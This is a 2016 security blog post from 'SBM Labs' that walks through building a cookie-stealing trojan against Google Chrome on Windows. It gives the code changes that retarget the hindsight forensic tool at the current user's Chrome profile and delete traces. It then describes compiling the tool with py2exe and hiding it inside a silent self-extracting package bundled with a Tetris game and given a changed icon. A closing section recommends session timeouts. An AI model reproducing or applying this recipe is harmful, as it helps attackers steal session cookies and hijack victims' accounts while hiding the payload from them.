SBM Labs

Cyber Security Collaboration Project

Attack to encrypted Google Chrome cookies
29 Jul 2016

As possible you know Google Chrome cookies are encrypted. Encryption mechanisms rely on Windows Crypto API and use authentication data of current user session. Such implementation doesn't require any additional requests to user but has weakness. Let's try to simulate attack to Chrome cookies.

1. Download and install software.

We will use hindsight utility. This tool was developed for forensics of Google Chrome/Chromium profile and allows to decrypt cookies.

We also need to install Python, Python for Windows Extensions and py2exe.

2. Modify script hindsight.py.

Set input and output configuration.

# SBM Labs - Custom configuration
#parser.add_argument('-i', '--input', help='Path to the Chrome(ium) "Default" directory', required=True)
parser.add_argument('-i', '--input', help='Path to the Chrome(ium) "Default" directory', required=False)

# SBM Labs - Custom configuration
args.input = os.path.join(os.path.expandvars("%userprofile%"),"AppData\\Local\\Google\\Chrome\\User Data\\Default\\")
args.output = os.path.join(os.path.expandvars("%userprofile%"),"AppData\\Local\\Google\\Chrome\\User Data\\Default\\decrypted_cookies_{timestamp}".format(timestamp=time.strftime('%Y-%m-%dT%H-%M-%S')))
args.mode = "overwrite"

Create copies of databases in order to have opportunity to analyze cookies even in case when browser is started.

# SBM Labs - Custom configuration
# database_path = os.path.join(path, database)
temp_database = "temp_" + database
shutil.copy2(os.path.join(path, database),os.path.join(path, temp_database))
database_path = os.path.join(path, temp_database)

# SBM Labs - Custom Configuration
import shutil

Delete tracks.

# SBM Labs - Custom configuration
for f in os.listdir(args.input):
if re.search("temp", f):
os.remove(os.path.join(args.input, f))

Optionally you can add additional action to the script. For example, copy cookies to remote host. It's out of our scope.

3. Test script hindsight.py.

Check Chrome cookies.

Run script.

Check results.

4. Convert script hindsight.py to executable file.

Create configuration file setup.py for converting script to singe executable file.

from distutils.core import setup
import py2exe
setup(console=['C:\*****\*****\hindsight-master\hindsight.py'], options = {'py2exe': {'bundle_files': 1}}, zipfile = None)

Run converting.

C:\Python27>python.exe setup.py py2exe

Check results.

5. Prepare malicious package.

We need to get some application that will be interesting to victim. For example, game "Tetris". Then we are ready to create self-extracting package. We will use iexpress.

Below we will look at some interesting for attacker options. First of all we need to add our applications to the package.

Set install program our converted script and post install comand game application.

Set hidden mode.

Hide file extracting process.

6. Change package icon.

You can use Resource Hacker tool in order to change icon.

Check Results.

7. Conclusions.

So attacker can prepare malicious package, send it to victim and steal cookies in despite of its encryption. Then attacker will try to get access to different application using user valid sessions. That's why it's necessary to implement session expiration, session timeout etc for financial and other critical applications. I recommend you to read Session Management Cheat Sheet from OWASP.

Transparent cookies encryption is useful in case of direct attacks to cookies file. But it doesn't provide high level protection. More secure way will be request additional password/secret key from user in order to decrypt data but it's not user-friendly.